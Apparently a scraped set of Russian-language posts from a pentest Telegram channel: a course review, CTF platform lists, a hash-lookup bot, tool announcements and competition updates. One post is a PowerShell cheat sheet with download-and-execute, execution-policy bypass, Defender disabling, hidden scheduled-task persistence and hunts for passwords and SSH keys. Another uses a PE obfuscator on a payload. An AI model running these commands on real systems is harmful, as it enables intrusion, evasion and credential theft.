Недавно закончил обучение на курсе
Далее мое сугубо индивидуальное мнение
На формирование итогового мнения о курсе влияет большое количество факторов:
▪️ количество времени, которое вы готовы уделять курсу
▪️ уровень ваших знаний по теме курса в момент его старта
▪️ уровень ваших знаний по смежным темам и т.д.
Причины выбора курса:
1. Авторский/кураторский состав
Думаю, что решающим фактором записаться на курс в первом потоке конкретно для меня была строка в одном из рекламных сообщений: "Первые два потока кураторами курса являются его авторы"
Там он и рассказал, что является Red и Purple тимлидом. В интервью, которое он давал перед стартом курса, он подтверждает это. Канал Павла
2. Отсутствие аналогов в 🇷🇺 РФ
Этот тезис был одним из рекламных слоганов. Я думаю, что каждый, кто обучается или обучался на курсах по ИБ примерно представляет себе, как выглядит рынок этих курсов в России. И думаю многие понимают, что это правда.
В русскоязычном сегменте, из известных мне курсов по внутрянке, есть лишь ещё курс по тестированию инфраструктуры от CyberEd. Но он не сосредоточен только на AD. Он также затрагивает темы тестирования инфраструктуры в Linux. Так что данный курс действительно уникальный в данном сегменте.
Курс затрагивает очень большое количество тем.
Начинается с базовых теоретических понятий: объект, лес, домен и т.д.
Далее идет блок, связанный с пентестом
Блок про туннелирование
А потом начинается AD - kerberos, делегирование, уязвимые ACL, ретрансляционные атаки, тестирование
Не смотря на то, что в большинстве своем методички составлены прекрасно, главное преимущество курса, это конечно же, практические лабораторные к каждому уроку. 16 больших стендов для отработки всего изученного материала и экзаменационный стенд.
Количество хостов в домене по мере движения по курсу растет. Количество техник и методик, которые нужно применять, чтобы скомпрометировать машинку также увеличивается.
В лабах работают боты на почтовых сервисах, которые по разному отвечают в зависимости от контекста. Скрипты, которые запускают службы, позволяя реализовать DLL-hijacking. Все лабы логически и последовательно выстроены.
Большой и сложный экзамен, на решение которого дается 24 часа является отличной проверкой ваших знаний. Только вы, задания и лабораторный стенд.
Огромное спасибо Паше и Мише за разработку отличного курса.
Я почти уверен, что любой, кто самостоятельно сможет пройти данный курс от начала и до конца вполне может претендовать на должность пентестера.
P.S. Для будущих поколений, ребят, курс сложный, рассчитывайте свои навыки, база должна быть приличной. И да прибудет с вами сила!
#active_directory #windows #course #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
Pentest-Ground
Vulnerable apps to benchmark your scanners and your skills
Площадка с заведомо уязвимыми веб-приложениями и сетевыми сервисами. Можно использовать для проверки эффективности инструментов поиска уязвимостей или в образовательных целях
Поднятые лаборатории:
Damn Vulnerable Web Application - классическое веб приложение
Damn Vulnerable GraphQL Application - GraphQL
RestFlaw - REST API
ShadowLogic - WebLogic
CipherHeart - Redis
GuardianLeaks - веб приложение
Реверт лаб происходит каждые 30 минут
#pentest #training #dvwa #pentestground #graphql
Please open Telegram to view this post
VIEW IN TELEGRAM
Недавно был пост об отличном сервисе Weakpass у которого в наличии абсолютно бесплатный API
Прикрутил к боту Password lookup (MD5, NTLM, SHA1 или SHA256)
import requests
from aiogram import Router, F
from aiogram.types import Message
import logging
import app.config.cfg as cfg
import json
router: Router = Router()
def check_hash_string(hash_string: str):
try:
headers = {'Content-Type': 'application/json'}
url = requests.get(f'https://weakpass.com/api/v1/search/{hash_string}.json', headers=headers)
output = json.loads(url.text)
hash_info = json.dumps(output, indent=2)
return hash_info
except Exception as e:
logging.warning(e)
@router.message(F.text.startswith(cfg.all_commands['check_hash']))
async def check_hash(message: Message):
try:
msg = message.text.split()
if len(msg) == 2:
await message.answer(f'<b>{check_hash_string(msg[1])}</b>', disable_web_page_preview=True)
else:
await message.answer(f'Пример:\n<code>!check_hash 5f4dcc3b5aa765d61d8327deb882cf99</code>')
except Exception as e:
logging.warning(e)
Работает в чате канала
!check_hash 5f4dcc3b5aa765d61d8327deb882cf99#weakpass #api #bot #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Как вы уже знаете, мой предыдущий канал был заблокирован.
Получено уведомление:
Your community Pentest HaT was blocked for violations of the Telegram Terms of Service (illegal goods) based on user reports confirmed by our moderators.
К сожалению, никаких подробностей мне не предоставили — что именно считается "illegal goods", осталось загадкой. Судя по всему, кто-то решил накидать абуз, и канал забанили без разбирательства.
Вот что написано в ToS:
▪️ Не использовать мессенджер для рассылки спама или обмана пользователей;▪️ Не призывать к насилию в публичных каналах, ботах и других общедоступных чатах в Telegram;▪️ Не размещать незаконный порнографический контент в каналах, ботах и других общедоступных чатах в Telegram.▪️ Не заниматься деятельностью, которая признана незаконной в большинстве стран. Это включает жестокое обращение с детьми, продажу или предложение незаконных товаров и услуг (наркотики, оружие, поддельные документы) и т.д.
Понятия не имею, что из этого я мог нарушить
Конечно приятного мало и я слегка расстроился, но руки не опустились и было принято решение создать новый канал
Все важные материалы перенесены, а также сохранена работа ботов. Планирую продолжить публиковать обзоры полезных Red Team инструментов, свежих CVE, PoC-эксплоитов и других полезных материалов из мира кибербезопасности.
Буду признателен всем тем кто подпишется
Репост и распространение информации приветствуется
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19😢2
www.warp.dev
Warp: The Agentic Development Environment
The fastest way to build with multiple AI agents, from writing code to deploying it. Trusted by over half a million engineers, Warp gives developers speed, privacy, and control to ship faster.
Современный многофункциональный терминал со встроенным AI ассистентом (free 50 запросов в неделю)
Написан на
В данный момент работает под
UPD. Подвезли поддержку
Пока только начал тестировать, немного непривычно, но довольно удобный и богатый функционал радует.
Установка via winget:
winget install Warp.Warp
Установка:
brew install --cask warp
sudo apt install ./<file>.deb
sudo dnf install ./<file>.rpm
sudo pacman -U ./<file>.pkg.tar.zst
Или добавим репозиторий и устанавливаем 1ой командой:
sudo apt install wget gpg
wget -qO- https://releases.warp.dev/linux/keys/warp.asc | gpg --dearmor > warpdotdev.gpg
sudo install -D -o root -g root -m 644 warpdotdev.gpg /etc/apt/keyrings/warpdotdev.gpg
sudo sh -c 'echo "deb [arch=amd64 signed-by=/etc/apt/keyrings/warpdotdev.gpg] https://releases.warp.dev/linux/deb stable main" > /etc/apt/sources.list.d/warpdotdev.list'
rm warpdotdev.gpg
sudo apt update && sudo apt install warp-terminal
#warp #terminal #rust #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5 1
Надоели мне все эти
В моем личном рейтинге занимает твердое первое место, как худшая ОС в истории, которой мне довелось пользоваться 😁😱
#windows
Please open Telegram to view this post
VIEW IN TELEGRAM
😁6🌚1
Windows, *nix машины для самостоятельного пентеста. Во free тарифе всегда доступно 20 машин. Обучение, академия, лабы и т.д. Есть огромное количество CTF заданий в различных категориях.
Возможность сдать экзамены и получить сертификаты CBBH (Certified Bug Bounty Hunter), CPTS (Certified Penetration Testing Specialist), CWEE (Certified Web Exploitation Expert) и CDSA (Certified Defensive Security Analyst)🙃
Аналог HackTheBox без CTF заданий. Академия в наличии, также присутствует free тариф😁
Академия веб пентеста от создателей BurpSuite. Для сдачи экзамена необходима активная подписка на Burp Suite Professional, цена экзамена 99$😈
Информацию почти обо всех прошедших и предстоящих CTF соревнованиях можно найти здесь
Русскоязычная площадка😎 . Большое (300+) количество CTF задач в самых различных категориях (web, crypto, rev, pwn, osint и т.д.), в наличии Windows и Linux машины. Есть бесплатный тариф
Один из лучших ресурсов с задачами по криптографии. Нравится криптография ? Вам сюда, от азов до сложнейших задач
Киберполигон от компании😎 Positive Technologies. Это виртуальная инфраструктура с реалистичными копиями IT-систем из разных отраслей. Достаточно высокий порог вхождения. Ежегодно проводятся турниры, куда вы можете отобраться со своей командой
Русскоязычная площадка от ребят из команды TaipanByte, большое кол-во тасков (80+) во всех основных категориях
Образовательная платформа, позволяющая изучать и практиковать основные концепции кибербезопасности. Рассчитана на новичков
Appsec тренировки, LLM, owasp top10, owasp api top10, aws top10 и т.д.
Путешествие в мир Linux, основные команды, лабы, руководства
Игра из 34 уровней для изучения Linux
Большое количество (~4000) крякми для изучения. Подойдет реверсерам
Для любителей бинарной эксплуатации (PWN)
Русскоязычная площадка. One task of the month - выкладывают по 1ой CTF задаче в месяц, в этом году планируют 10 заданий в категориях: web, pwn, crypto, reverse, misc и т.д.
Огромное (500+) кол-во заданий в самых разных категориях
Площадка с CTF заданиями начального уровня, почти на все задания можно найти райтапы
ВМ Phoenix для изучения уязвимостей, разработки эксплойтов, отладки программного обеспечения и общих проблем кибербезопасности
Темы - Network programming, Stack overflows, Format string vulnerabilities, Heap overflows
Парольные загадки (ребусы), например, пароль это сумма чисел от 1 до 446, соответственно надо написать простенькую автоматизацию и ввести в поле ввода
Простенький хакер квест состоящий из 20 уровней
#htb #crackmes #bandit #hacking #ctf #ethical
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9🔥5 2 2 2
Напоминаю, что по адресу @whitehat_chat находится чатик, в котором можно пообщаться и задать интересующие вас вопросы, так же там "живет" бот, обладающий полезным функционалом:
!hash a6105c0a611b41b08f1209506350279e
!ss Microsoft Exchange 2019
!poc CVE-2023-46604
!check_hash a6105c0a611b41b08f1209506350279e
!port ya.ru 80
!bridges
!feedback
!qr https://t.iss.one/wh_lab
#bot #chat
Please open Telegram to view this post
VIEW IN TELEGRAM
Я, понятное дело за HackerLab
Проходят 5 команд
Реализовано 13 из 24 критических событий
Всем успехов и немного удачи!
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤2 2 1
Высокоскоростной инструмент для пассивного сбора и эффективного обнаружения URL-адресов. От создателей nuclei, написан на
UPD. Добавили scope контроль:
SCOPE:
-us, -url-scope string[] in scope url regex to be followed by urlfinder
-uos, -url-out-scope string[] out of scope url regex to be excluded by urlfinder
-fs, -field-scope string pre-defined scope field (dn,rdn,fqdn) or custom regex (e.g., '(company-staging.io|company.com)') (default "rdn")
-ns, -no-scope disables host based default scope
-do, -display-out-scope display external endpoint from scoped crawling
Установка:
go install -v github.com/projectdiscovery/urlfinder/cmd/urlfinder@latest
Запуск:
urlfinder -d tesla.com
# Match и filter
urlfinder -d tesla.com -m support -f faq
urlfinder -d tesla.com -m include-patterns.txt -f exclude-patterns.txt
# JSON export
urlfinder -d tesla.com -j
#urlfinder #soft #golang #web #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
2ой день отборов
Проходят 5 команд
Реализовано 17 из 24 критических событий
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7 1
Один из лучших инструментов для определения типа хеша. Написан на
UPD. Вышло большое обновление до мажорной 3.0.0 версии - changelog
Поддержка 641 хеша
7 новых типов хешей
Множественные улучшения (описания и исправления для JtR и HC)
Поддержка Ruby 3.4
Поддержка современных алгоритмов (SHA3, Keccak, Blake2, etc.)
Показывает формат для Hashcat и JohntheRipper
Работает как приложение и библиотека
Установка:
gem install haiti-hashПримеры:
haiti 786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce
SHA-512 [HC: 1700] [JtR: raw-sha512]
SHA3-512 [HC: 17600] [JtR: raw-sha3]
SHA3-512 [HC: 17600] [JtR: dynamic_400]
Keccak-512 [HC: 18000] [JtR: raw-keccak]
BLAKE2-512 [JtR: raw-blake2]
Whirlpool [HC: 6100] [JtR: whirlpool]
Salsa10
Salsa20
Skein-512 [JtR: skein-512]
Skein-1024(512)
Библиотека:
require 'haiti'
# Instantiate a HashIdentifier object that will automatically identify
# the hash type
hi = HashIdentifier.new('786a02f742015903c6c6fd852552d272912f4740e15847618a86e217f71f5419d25e1031afee585313896444934eb04b903a685b1448b755d56f701afe9be2ce')
# Loop over the hash type candidates and retrieve data
hi.type.each do |type|
name = type.name
hashcat_id = type.hashcat
john_ref = type.john
extended = type.extended
samples = type.samples
end
#haiti #hash #soft #ruby
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8 2
GitHub
GitHub - DosX-dev/Astral-PE: Astral-PE is a low-level mutator (Headers/EP obfuscator) for native Windows PE files (x32/x64)
Astral-PE is a low-level mutator (Headers/EP obfuscator) for native Windows PE files (x32/x64) - DosX-dev/Astral-PE
Протектор для
Изменяет важные структуры - timestamps, headers, section flags, debug info, import/export
./Astral-PE.exe payload.exe -o payload_clean.exe
#astralpe #mutator
Please open Telegram to view this post
VIEW IN TELEGRAM
Виртуальная лаборатория, основанная на
Предустановленные лабы и инструменты:
▪️ OWASP Juice Shop▪️ WebGoat▪️ Mutillidae▪️ bWAPP▪️ DVWA▪️ Burp Suite▪️ Nikto▪️ SQLMap
#web #pentest #samurai
Please open Telegram to view this post
VIEW IN TELEGRAM
Показывает прогресс многих Coreutils инструментов, cp, mv, dd, tar, gz и т.д.
Установка в
sudo apt install progress
Использование:
watch progress -q
progress -w
watch progress -wc firefox
progress -c httpd
cp bigfile newfile & progress -mp $!
#progress #coreutils
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5 2❤1 1
Заключительный день отборов
В финал пройдут 5 команд
Отчеты принимаются до 22.00
Реализовано 22 из 24 критических событий
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10 2 1
Реализовано 22 из 24 критических событий
2 нерешенных таска объявляю лютейшей уцуцугой
#standoff #quals
Please open Telegram to view this post
VIEW IN TELEGRAM
Для выполнения некоторых командлетов необходим импортированный AD модуль
Подключаем:
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory
или
Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module C:\ActiveDirectory\ActiveDirectory.psd1
Get-Command -Module ActiveDirectory
Информация о системе:
Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *
Список процессов:
Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending
FailureAudit в логах:
Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}Сканер портов:
1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }Выполнить команду на удаленном ПК:
Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)Скачать и выполнить скрипт:
$url = 'https://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)
Execution policy bypass:
Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1
Список доменных юзеров:
# Нужен AD модуль
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate
Список залогиненых юзеров:
Get-WMIObject -Class Win32_ComputerSystem -Computer "HOST01" | Select-Object Username
Давно не логинились, но УЗ включена:
# Нужен AD модуль
Get-ADuser -filter {enabled -eq "True"} -properties LastlogonDate | ? {$_.lastlogondate -le (get-date).adddays(-90)} | ft Name
Прибить процесс:
Get-Process -Name "Notepad" | Stop-Process -Force
Список установленного ПО:
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, Publisher, InstallDate
Мониторинг изменений ФС:
$watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }Отключаем Defender:
Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -DisableRealtimeMonitoring $true
Задание в планировщик для закрепа:
$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "YourCommand"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'MyTask' -Description 'MyDescription'
Поиск паролей в текстовых файлах:
Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'password' -CaseSensitive
Собираем SSH ключи:
Get-ChildItem -Path C:\Users\*\.ssh\id_rsa -Recurse
Продолжение следует
#powershell #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8❤3 2
Forwarded from Пентестер на мотоцикле
Наткнулся на настоящее сокровище для веб-пентестера — огромную подборку расширений для Burp Suite (Community и Pro) с их описанием на GitHub. Здесь есть всё, чтобы прокачать ваш инструмент до боевого монстра!
▎ Внутри репозитория:
А какие добавленные расширения вам больше всего понравились?
Please open Telegram to view this post
VIEW IN TELEGRAM
Клон cat'a с поддержкой подсветки синтаксиса
Кроссплатформенный, написан на
По умолчанию работает как утилита less с построчным выводом. Для отключения можно сделать alias:
alias cat='bat --paging=never'
Основную функцию - конкатенацию, выполняетbat 1.txt 2.txt 3.txt > merged.txt
wget https://github.com/sharkdp/bat/releases/download/v0.25.0/bat-musl_0.25.0_musl-linux-amd64.deb
sudo dpkg -i bat-musl_0.25.0_musl-linux-amd64.deb
Если будете ставить через sudo apt install bat в зависимости от дистрибутива утилита может называться batcatwinget install sharkdp.bat
# Несколько файлов
bat src/*.rs
# Из stdin
curl -s https://sh.rustup.rs | bat
# Показать непечатные символы
bat -A /etc/hosts
tail -f /var/log/pacman.log | bat --paging=never -l log
#bat #soft #rust
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
И еще один хороший материал подъехал пол часа назад)
В блоге рассматривается шифрование MSSQL Server и методы подбора ключей.
https://specterops.io/blog/2025/04/08/the-sql-server-crypto-detour/
Что еще прикольное узнали из блога: ManageEngine ADSelfService по умолчанию использует ключ, который Microsoft показывает в качестве примера в своей справке😁 прикол конечно...
#pentest #redteam #sql #ad
В блоге рассматривается шифрование MSSQL Server и методы подбора ключей.
https://specterops.io/blog/2025/04/08/the-sql-server-crypto-detour/
Что еще прикольное узнали из блога: ManageEngine ADSelfService по умолчанию использует ключ, который Microsoft показывает в качестве примера в своей справке😁 прикол конечно...
#pentest #redteam #sql #ad
SpecterOps
Blog - SpecterOps
Your new best friend: Introducing BloodHound Community Edition!
❤8